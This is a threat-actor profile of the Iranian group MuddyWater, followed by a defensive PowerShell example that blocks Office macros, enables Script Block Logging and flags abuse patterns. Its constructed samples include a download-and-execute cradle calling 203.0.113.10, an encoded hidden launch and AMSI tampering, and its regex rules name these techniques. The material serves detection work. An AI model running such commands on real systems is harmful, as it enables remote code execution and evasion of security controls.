Nation-State Actor
MuddyWater
Iran • Active since 2017
MuddyWater is an Iranian espionage group that delivers malware through decoy documents posing as invoices or résumés. Opening the attachment and enabling its macro infects the victim's computer. Its targets are mainly governments and telecommunications providers in the Middle East.
Overview
MuddyWater is an Iranian state-sponsored threat group attributed to the Ministry of Intelligence and Security (MOIS). They conduct espionage against government and telecom sectors across the Middle East, Asia, and Europe.
Also Known As
Static Kitten, MERCURY, Seedworm, Mango Sandstorm
Target Industries
Government, Telecommunications, Oil & Gas, Defense, Education
Target Regions
Middle East, Turkey, Pakistan, Europe, United States
Tactics, Techniques & Procedures
- Spear-phishing with malicious macros
- Living off the land
- PowerShell abuse
- Side-loading DLLs
- Tunneling tools
Known Tools & Malware
POWERSTATS, MORIAGENT, Small Sieve, STARWHALE, PhonyC2
Notable Campaigns
Middle East Government Targeting (2022)
Widespread campaign against government entities using novel PowerShell implants.
Telecom Sector Operations (2021)
Targeted telecom providers for intelligence collection.
MITRE ATT&CK Techniques
T1566.001 (Phishing: Spearphishing Attachment), T1059.001 (Command and Scripting Interpreter: PowerShell), T1218 (System Binary Proxy Execution), T1574.002 (Hijack Execution Flow: DLL Side-Loading), T1572 (Protocol Tunneling)
Defense Recommendations
1. Disable Office macros organization-wide
2. Monitor for PowerShell abuse patterns
3. Deploy advanced email filtering
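The first two recommendations, as an added worked example that is not part of the original page: a PowerShell script that applies the Office macro-blocking policy values and enables Script Block Logging, then runs a small pattern check over constructed Event ID 4104 script block texts. The registry paths are the documented Office and PowerShell policy keys; the sample log lines, the rule names and the pattern list are assumptions made for this illustration, not the group's actual command lines.

```powershell
# Added example (not from the original page): macro blocking, Script Block Logging,
# and a simple PowerShell-abuse check over constructed 4104 script block texts.
# Registry paths are the documented policy keys; samples and patterns are assumptions.

# 1. Block VBA macros via Office policy (Office 16.0 = 2016/2019/2021/365).
#    VBAWarnings = 4 disables all macros without notification;
#    blockcontentexecutionfrominternet = 1 blocks macros in files carrying Mark-of-the-Web.
function Set-OfficeMacroPolicy {
    param([string[]]$Apps = @('Word', 'Excel', 'PowerPoint'))
    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name 'VBAWarnings' -Value 4 -Type DWord
        Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord
    }
}

# 2. Turn on Script Block Logging so executed PowerShell content is written to
#    Microsoft-Windows-PowerShell/Operational as Event ID 4104.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

# 3. Flag script blocks showing common abuse patterns: encoded commands, download
#    cradles piped to Invoke-Expression, AMSI tampering, and hidden/no-profile launches.
#    Emits one object per (rule, line) match; rule names are illustrative.
function Find-SuspiciousScriptBlock {
    param([Parameter(ValueFromPipeline)][string]$ScriptBlockText)
    begin {
        $patterns = @{
            'EncodedCommand'  = '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
            'DownloadCradle'  = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)'
            'IEXPipeline'     = '(?i)\|\s*(iex|Invoke-Expression)\b|\bIEX\s*\('
            'AmsiTampering'   = '(?i)amsiInitFailed|AmsiUtils'
            'HiddenNoProfile' = '(?i)-w(indowstyle)?\s+hidden|-nop(rofile)?\b'
        }
    }
    process {
        foreach ($name in $patterns.Keys) {
            if ($ScriptBlockText -match $patterns[$name]) {
                [pscustomobject]@{ Rule = $name; Text = $ScriptBlockText }
            }
        }
    }
}

# Constructed sample 4104 script block texts (not real telemetry).
$samples = @(
    'Get-ChildItem C:\Users\alice\Documents',
    'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/s.ps1")',
    '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")'
)
$samples | Find-SuspiciousScriptBlock | Format-Table Rule, Text -AutoSize
```

Run `Set-OfficeMacroPolicy` and `Enable-ScriptBlockLogging` from an elevated session on a test machine before pushing the equivalent settings through Group Policy. To run the check against real events instead of the constructed samples, feed it the ScriptBlockText property of 4104 events: `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | ForEach-Object { $_.Properties[2].Value } | Find-SuspiciousScriptBlock`. The patterns are deliberately broad and will fire on legitimate administration scripts; treat hits as triage leads, not verdicts.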